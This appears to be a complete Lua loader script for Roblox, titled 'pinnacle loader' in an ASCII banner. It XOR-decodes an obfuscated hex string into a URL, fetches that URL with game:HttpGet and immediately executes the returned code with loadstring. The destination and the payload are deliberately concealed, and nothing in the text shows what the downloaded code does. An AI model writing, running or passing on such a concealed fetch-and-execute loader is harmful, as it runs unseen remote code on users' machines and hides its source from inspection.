--[[


       _                        _        _                 _           
      (_)                      | |      | |               | |          
 _ __  _ _ __  _ __   __ _  ___| | ___  | | ___   __ _  __| | ___ _ __ 
| '_ \| | '_ \| '_ \ / _` |/ __| |/ _ \ | |/ _ \ / _` |/ _` |/ _ \ '__|
| |_) | | | | | | | | (_| | (__| |  __/ | | (_) | (_| | (_| |  __/ |   
| .__/|_|_| |_|_| |_|\__,_|\___|_|\___| |_|\___/ \__,_|\__,_|\___|_|   
| |                                                                    
|_|                                                                    


]]

local a="5b414d46460f195b1a08044714071b1c100c16011c02170a0a475057421b565919471d160d1a011a07151c0c181c1b00164b635c575854565a112406120d161c40060008105d11151501171c58585f5b1a5a1b090d"local b=tostring(3*2*83*7222).."thisisnotencrypted"local function c(d,b)local e=""for f=1,#d,2 do local g=tonumber(d:sub(f,f+1),16)local h=string.byte(b,(f-1)/2%#b+1)e=e..string.char(bit32.bxor(g,h))end;return e end;local i=c(a,b)loadstring(game:HttpGet(i))()
